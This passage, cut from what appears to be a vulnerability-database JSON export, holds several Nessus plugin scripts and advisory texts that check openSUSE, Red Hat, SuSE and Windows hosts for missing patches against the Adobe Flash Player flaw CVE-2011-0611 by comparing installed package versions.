plugin were\n# extracted from openSUSE Security Update flash-player-4399.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53722);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-0611\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2011:0373-1)\");\n script_summary(english:\"Check for the flash-player-4399 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted Flash files could be exploited to execute arbitrary\ncode (CVE-2011-0611).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=686818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-04/msg00066.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"flash-player-10.2.159.1-0.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:08:36", "description": "Specially crafted Flash files could be exploited to execute arbitrary\ncode (CVE-2011-0611).", "edition": 24, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2011:0373-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "modified": "2014-06-13T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.4", "p-cpe:/a:novell:opensuse:flash-player"], "id": "SUSE_11_4_FLASH-PLAYER-110415.NASL", "href": "https://www.tenable.com/plugins/nessus/75833", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update flash-player-4399.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75833);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-0611\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2011:0373-1)\");\n script_summary(english:\"Check for the flash-player-4399 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted Flash files could be exploited to execute arbitrary\ncode (CVE-2011-0611).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=686818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-04/msg00066.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"flash-player-10.2.159.1-0.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:09:05", "description": "An updated Adobe Flash Player package that fixes one security issue is\nnow available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. This\nvulnerability is detailed on the Adobe security page APSB11-07, listed\nin the References section. Specially crafted SWF content could cause\nflash-plugin to crash or, potentially, execute arbitrary code.\n(CVE-2011-0611)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 10.2.159.1.", "edition": 28, "published": "2011-04-19T00:00:00", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2011:0451)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "modified": "2011-04-19T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.0"], "id": "REDHAT-RHSA-2011-0451.NASL", "href": "https://www.tenable.com/plugins/nessus/53482", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:0451. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53482);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-0611\");\n script_xref(name:\"RHSA\", value:\"2011:0451\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2011:0451)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes one security issue is\nnow available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. This\nvulnerability is detailed on the Adobe security page APSB11-07, listed\nin the References section. Specially crafted SWF content could cause\nflash-plugin to crash or, potentially, execute arbitrary code.\n(CVE-2011-0611)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 10.2.159.1.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-0611\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb11-07.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb11-07.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:0451\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2011:0451\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-10.2.159.1-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-10.2.159.1-1.el6\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:14:35", "description": "Specially crafted Flash files could be exploited to execute arbitrary\ncode. (CVE-2011-0611)", "edition": 23, "published": "2011-12-13T00:00:00", "title": "SuSE 10 Security Update : flash-player (ZYPP Patch Number 7477)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "modified": "2011-12-13T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_FLASH-PLAYER-7477.NASL", "href": "https://www.tenable.com/plugins/nessus/57189", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57189);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-0611\");\n\n script_name(english:\"SuSE 10 Security Update : flash-player (ZYPP Patch Number 7477)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted Flash files could be exploited to execute arbitrary\ncode. (CVE-2011-0611)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-0611.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7477.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"flash-player-10.2.159.1-0.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T14:38:20", "description": "Specially crafted Flash files could be exploited to execute arbitrary\ncode. (CVE-2011-0611)", "edition": 23, "published": "2011-04-19T00:00:00", "title": "SuSE 11.1 Security Update : flash-player (SAT Patch Number 4400)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "modified": "2011-04-19T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:flash-player"], "id": "SUSE_11_FLASH-PLAYER-110415.NASL", "href": "https://www.tenable.com/plugins/nessus/53485", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53485);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-0611\");\n\n script_name(english:\"SuSE 11.1 Security Update : flash-player (SAT Patch Number 4400)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted Flash files could be exploited to execute arbitrary\ncode. (CVE-2011-0611)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=686818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-0611.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 4400.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"flash-player-10.2.159.1-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T02:43:42", "description": "The remote Windows host contains a version of Adobe Flash Player\nearlier than 10.2.159.1. Such versions are reportedly affected by a\nmemory corruption vulnerability. \n\nBy tricking a user on the affected system into opening a specially\ncrafted document with Flash content, such as a SWF file embedded in a\nMicrosoft Word document, an attacker can potentially leverage this\nissue to execute arbitrary code remotely on the system subject to the\nuser's privileges. \n\nNote that there are reports that this issue is being exploited in the\nwild as of April 2011.", "edition": 27, "published": "2011-04-18T00:00:00", "title": "Flash Player < 10.2.159.1 ActionScript Predefined Class Prototype Addition Remote Code Execution (APSB11-07)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB11-07.NASL", "href": "https://www.tenable.com/plugins/nessus/53472", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(53472);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/07/11 17:09:26\");\n \n script_cve_id(\"CVE-2011-0611\");\n script_bugtraq_id(47314);\n script_xref(name:\"CERT\", value:\"230057\");\n script_xref(name:\"Secunia\", value:\"44119\");\n \n script_name(english:\"Flash Player < 10.2.159.1 ActionScript Predefined Class Prototype Addition Remote Code Execution (APSB11-07)\");\n script_summary(english:\"Checks version of Flash Player\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a browser plug-in that allows\narbitrary code execution.\");\n\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host contains a version of Adobe Flash Player\nearlier than 10.2.159.1. Such versions are reportedly affected by a\nmemory corruption vulnerability. \n\nBy tricking a user on the affected system into opening a specially\ncrafted document with Flash content, such as a SWF file embedded in a\nMicrosoft Word document, an attacker can potentially leverage this\nissue to execute arbitrary code remotely on the system subject to the\nuser's privileges. \n\nNote that there are reports that this issue is being exploited in the\nwild as of April 2011.\" );\n \n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9ee82b34\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb11-07.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe Flash Player 10.2.159.1 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value: \"2011/04/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2011/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/18\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n \n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n exit(0);\n}\n\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/Flash_Player/installed');\n\n# Identify vulnerable versions.\ninfo = '';\n\nforeach variant (make_list(\"Plugin\", \"ActiveX\", \"Chrome\"))\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n if (!isnull(vers) && !isnull(files))\n {\n foreach key (keys(vers))\n {\n ver = vers[key];\n if (ver)\n {\n iver = split(ver, sep:'.', keep:FALSE);\n for (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n if (\n (\"Plugin\" >< variant || \"ActiveX\" >< variant) && (\n iver[0] < 10 ||\n (\n iver[0] == 10 &&\n (\n iver[1] < 2 ||\n (\n iver[1] == 2 &&\n (\n iver[2] < 159 ||\n (iver[2] == 159 && 